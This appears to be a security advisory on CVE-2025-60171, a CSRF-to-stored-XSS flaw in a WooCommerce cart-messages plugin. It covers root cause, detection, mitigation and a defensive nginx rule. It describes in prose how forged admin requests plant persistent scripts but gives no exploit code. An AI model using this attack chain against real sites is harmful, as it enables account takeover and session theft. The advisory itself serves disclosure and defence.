CVE-2025-60171: WooCommerce CSRF and Stored XSS Flaw

CVE-2025-60171 Overview

CVE-2025-60171 is a Cross-Site Request Forgery (CSRF) vulnerability in the Conditional Cart Messages for WooCommerce plugin by YourPlugins.com (yourplugins-wc-conditional-cart-notices). The flaw affects all plugin versions up to and including 1.2.10. An attacker can chain the CSRF weakness with stored Cross-Site Scripting (XSS) to inject persistent JavaScript into the WordPress administration interface. Exploitation requires tricking an authenticated administrator into visiting a crafted page or link.

Critical Impact
A successful attack stores malicious JavaScript in the WooCommerce site, enabling session theft, administrative account takeover, and arbitrary actions performed in the victim's browser context.

Affected Products

Conditional Cart Messages for WooCommerce – YourPlugins.com (yourplugins-wc-conditional-cart-notices)
All versions from initial release through 1.2.10
WordPress sites running WooCommerce with this plugin installed

Discovery Timeline

2025-09-26 - CVE-2025-60171 published to NVD
2026-04-28 - Last updated in NVD database

Technical Details for CVE-2025-60171

Vulnerability Analysis

The plugin exposes state-changing administrative endpoints that do not validate the origin of incoming requests. The issue is classified under CWE-352: Cross-Site Request Forgery. Because the affected handlers also fail to sanitize input before storing it, an attacker can leverage the CSRF primitive to plant persistent XSS payloads in plugin-managed settings such as cart notice messages.

When an authenticated WordPress administrator visits an attacker-controlled page, the browser automatically submits a forged request to the vulnerable endpoint using the administrator's session cookies. The plugin processes the request as legitimate and persists the attacker-supplied content. Any subsequent visit to a page rendering that content executes the stored script in the visitor's browser.

Root Cause

The vulnerability stems from missing CSRF protection on plugin settings handlers. WordPress provides nonce primitives such as wp_nonce_field() and check_admin_referer(), but the affected endpoints in versions up to 1.2.10 do not enforce these checks. The absence of output encoding on the stored values compounds the issue and enables the stored XSS chain.

Attack Vector

The attack is network-based and requires user interaction. An attacker hosts a page containing a hidden form or fetch() call that targets the vulnerable plugin endpoint on the victim site. The attacker then social-engineers a logged-in administrator into loading that page. The forged request writes attacker-controlled JavaScript into the plugin's stored notice configuration. The payload then executes whenever the cart notice renders, achieving cross-context script execution with the privileges of any user who views the affected page.

No verified public proof-of-concept code is available. Refer to the Patchstack Vulnerability Report for additional advisory details.

Detection Methods for CVE-2025-60171

Indicators of Compromise

Unexpected <script> tags, event handlers, or obfuscated JavaScript inside WooCommerce cart notice configuration entries stored by yourplugins-wc-conditional-cart-notices.
Administrative POST requests to plugin endpoints originating from external Referer headers or lacking valid WordPress nonces.
New or modified administrator accounts, plugin installations, or option changes following an admin session.

Detection Strategies

Audit the wp_options table and plugin-specific tables for entries containing HTML or script content within cart notice fields.
Review web server access logs for POST requests to /wp-admin/admin.php or admin-post.php referencing the plugin slug from off-domain referrers.
Compare the installed plugin version against 1.2.10 and flag any site running an affected build.

Monitoring Recommendations

Enable a web application firewall ruleset that inspects WordPress admin requests for missing or invalid _wpnonce parameters.
Forward WordPress and webserver logs to a centralized analytics platform and alert on anomalous administrator-initiated configuration changes.
Monitor browser-side errors and Content Security Policy (CSP) violation reports for unexpected inline script execution on storefront pages.

How to Mitigate CVE-2025-60171

Immediate Actions Required

Update Conditional Cart Messages for WooCommerce to a version later than 1.2.10 as soon as the vendor publishes a fix.
If no patched version is available, deactivate and remove the plugin until remediation is released.
Force a password reset and invalidate active sessions for all WordPress administrator accounts on affected sites.

Patch Information

The advisory tracked by the Patchstack Vulnerability Report covers all versions up to and including 1.2.10. Site administrators should monitor the YourPlugins.com vendor channel and the WordPress.org plugin page for an updated release that introduces CSRF nonce validation and input sanitization on the affected handlers.

Workarounds

Restrict /wp-admin/ access by source IP at the reverse proxy or firewall layer to reduce CSRF exposure.
Deploy a WAF rule that rejects WordPress admin POST requests missing a valid _wpnonce parameter or carrying an off-site Referer.
Enforce a strict Content Security Policy that disallows inline scripts on storefront pages to limit stored XSS impact.
Instruct administrators to use a separate browser profile for WordPress administration and to log out of admin sessions when not in use.

bash

# Example: block off-site POSTs to WordPress admin endpoints (nginx)
map $http_referer $wp_admin_offsite {
    default 1;
    "~*^https?://your-site\.example/" 0;
}

location ~ ^/wp-admin/(admin\.php|admin-post\.php|options\.php) {
    if ($request_method = POST) {
        if ($wp_admin_offsite) { return 403; }
    }
}